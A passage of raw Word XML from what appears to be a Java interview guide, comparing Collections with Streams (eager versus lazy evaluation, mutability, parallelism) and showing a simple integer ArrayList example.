                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Data is processed when you explicitly call a method (e.g., forEach() or add()).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78ED26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processing</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Operations are executed when the stream is actually consumed (terminal operations like collect(), forEach()).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3DF515F5" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47CA4E4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37298D2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parallel by default</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Collections are single-threaded unless explicitly made parallel (e.g., CopyOnWriteArrayList).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5017D93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izable</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Streams can be processed in parallel using parallelStream() for concurrent processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E581EF5"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B8AB8">
          <v:rect id="_x0000_i1475" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A89D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odifications and Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7EB2D"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2AC5C177"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>store data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modify the data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly (e.g., adding or removing elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9BBAD5"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collections are generally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they happen immediately when called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B8976"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16B52A5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t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>do not modify the underlying data source</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; instead, they process elements through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pipeline of operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The operations are executed when a terminal operation is invoked (e.g., collect(), forEach(), reduce()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26277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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and they can be processed lazily, meaning that intermediate operations are not executed until a terminal operation is performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4F4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58B04">
          <v:rect id="_x0000_i1476" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8486E"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 Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F7C4D"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1C075BB"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ager operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can result in immediate performance hits if the collection is large or if modifications are frequent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71662A"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ions can hold large amounts of data, but the performance of operations like filtering or transformations can be slow when done repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69544B"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0FD37E77"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improves performance because intermediate operations are only performed when a terminal operation is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA75E11"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help improve performance for large data sets, especially when the processing can be split into independent tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D08CEB"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2C794">
          <v:rect id="_x0000_i1477" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAC59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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493A66B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Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082DA1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6F652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2C3A797" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2700F67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llectionExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD00D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150F8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E0120C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C536CB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7EEDC4"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6B745C0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FA9077"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fruit : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C851A0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ruit);  // Eager processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944F8A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404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330FF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F7A73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Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7671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599A87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E13E18" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6617D6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3B7FF2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6996C5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Arrays.asList("apple", "banana", "cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE015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E59E1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tream()  // Creating a stream from the collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE1F5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fruit -&gt; fruit.startsWith("a"))  // Intermediate operation (lazy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634F7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Terminal operation (eager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903866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4702E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7B661"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FF82A2">
          <v:rect id="_x0000_i1478" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C8C3F"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Operations Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CFAA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Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F94B4A"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elements using add(), remove(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA0F35"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using loops, for-each, or iterators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6160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Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44771594"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filter(), map(), sorted(), distinct(), etc. (lazy operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2783BA37"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collect(), reduce(), forEach(), count(), etc. (eager operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B95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36315">
          <v:rect id="_x0000_i1479" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF691E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17"/>
        <w:gridCol w:w="5609"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="193FD3AF" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A473E4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2D05F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0C4A4B85"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D947DA" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A8940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E44886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orage and manipulation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="463164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processing (functional style).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="373D9F4F" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA6684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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73FC911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table (direct modification of data).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B57ED7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modifies data via pipelines).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3ABA3AA9" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5215729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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD8E87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to elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5BC5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elements via functional operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="46DAC5EE" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156938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ecution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00AEBDD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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB6189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done only when terminal operation is called).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7B4E5F1D" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E815A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4F945BF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parallel by default.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099A30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parallel processing using parallelStream().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="235B1057" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A3E2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="123187D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 Set, Queue, Map.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11346D8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r>
    </w:tbl>
    <w:p w14:paraId="778E9ED6"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CFB7C">
          <v:rect id="_x0000_i1480" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="357071A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llections vs Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4DB8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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2684E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the data (e.g., adding/removing elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6BC2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store and manage a collection of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E3E79"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are working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simple operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like searching or iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F9B4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Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539494E2"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process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional style</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062094B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f data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7136B"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transform, filter, and aggregate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data in a clean and expressive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2A26D"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34DEC97"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rimarily for storing and manipulating data, while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re used for processing sequences of elements in a more functional and declarative way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A3126"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provide a more flexible and concise approach to data processing but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in nature, whereas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etter for scenarios where you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the underlying data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C700E31" w14:textId="49314F81" w:rsidR="00F609ED" w:rsidRPr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142D941" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00F609ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1EF169" w14:textId="77777777" w:rsidR="000475CE" w:rsidRPr="00CE4B95" w:rsidRDefault="000475CE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc197867356"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a syntax for integer ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="1F084B8E" w14:textId="6DEFB22E" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921"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for integers in Java, you can use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lass from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Here's the syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C474EBF"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Integer ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A4A5C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5791D43" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326455F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gerArrayListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E423779"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5701E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of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF02EA3"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intList = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A26DD"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1CBA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ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F41B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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782957E8"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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E493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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EC3047"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40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104F77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95C096"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ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09EAC0"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intList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F7A5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84B34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F28B9"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F2A314D"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intList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This creates an ArrayList that stores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objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B226A0" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="005F393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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is used because ArrayList can only store objects, not primitive types like int. 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wraps the primitive int as an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D807ED2"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method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The add() method is used to add elements to the ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E2F0E"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This code will output the elements of the ArrayList when printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB01F8D"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ple Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B73A8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10, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45569CFB" w14:textId="28C86087" w:rsidR="00576921" w:rsidRPr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="606726CC" w14:textId="77777777" w:rsidR="00576921" w:rsidRPr="00CE4B95" w:rsidRDefault="00576921" w:rsidP="00576921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D440B15" w14:textId="77777777" w:rsidR="00C90B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00C90B00">
